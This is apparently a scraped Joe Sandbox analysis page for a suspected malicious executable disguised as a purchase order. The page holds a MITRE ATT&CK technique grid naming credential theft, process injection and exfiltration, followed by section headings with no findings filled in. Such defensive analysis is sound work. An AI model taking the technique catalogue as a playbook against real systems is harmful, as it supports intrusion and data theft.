Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	31 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Software Packing	LSA Secrets	261 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PURCHASE ORDER N0259305-06SN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
PURCHASE ORDER N0259305-06SN.exe